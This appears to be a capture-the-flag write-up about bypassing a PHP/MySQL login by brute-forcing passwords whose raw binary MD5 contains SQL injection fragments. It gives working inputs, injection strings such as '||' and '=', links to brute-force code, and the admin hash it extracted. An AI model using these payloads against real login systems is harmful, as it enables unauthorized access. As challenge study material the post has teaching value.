$r = mysql_query("SELECT login FROM admin WHERE password='" . md5($_GET['password'], true) . "'");Normally, web sites keep the password hash as hex string. But this challenge keep raw hash (binary 16 bytes) in database. Binary can be string. So To bypass login, the output of md5 has to look like
' or 1=1#The above string is what I thought first. But it is too long. To make the brute forcing fast, the required output string should be short. After checking from MySQL doc, I could make it shorter. Here is the list what I found
'or 1# <== no need for space after single quote, any non-zero number is TRUE '||1# <== || is same as OR, no need for space after ||Before writing the code for brute forcing, I remembered I can put non-printable characters in password using '%XX'. So 1 byte can be 256 values. No charset.
My code for brute forcing is http://pastebin.com/2xMG9rKi.
Ran it about 20 minutes on my slow windows pc, then got it.
password: 34b854c8 password: %34%b8%54%c8 result: c13e807082277c7c36231ed0dd34a863 result: ม>€p‚'||6# ะ4จc
Note: on linux, compile with "gcc -O2 -lssl -o prog prog.c" Note: If you want to see result from my program quick, run it with "./prog 4 4 200"
url?password=%34%b8%54%c8,then got the real admin hash. It is "071CC0720D0ABD73F61A291224F248D6". But I could not reverse admin hash :( so poor me. When searched in google, I found it in hashkiller but it was not solved.
Below is not my solution
Before finished this post, I found other 2 writeups of this challenge. Very nice solutions. They found shorter SQL injection string.
'||'Here is the modification of my code: http://pastebin.com/ThxBESPs. Got the result in a few minutes.
password: 2c55c819 password: %2c%55%c8%19 result: 3157e727097c7c27342e7dc2729f75ed result: 1W็' ||'4.}ยrŸuํSecond is http://blog.nibbles.fr/?p=2039. The SQL injection string is
'='Here is the modification of my code: http://pastebin.com/w5E54PNz. Got the result in a second.
password: 22a80f password: %22%a8%0f result: 047f1f9ed77f467a273d279d8e521422 result: žืFz'='ŽR "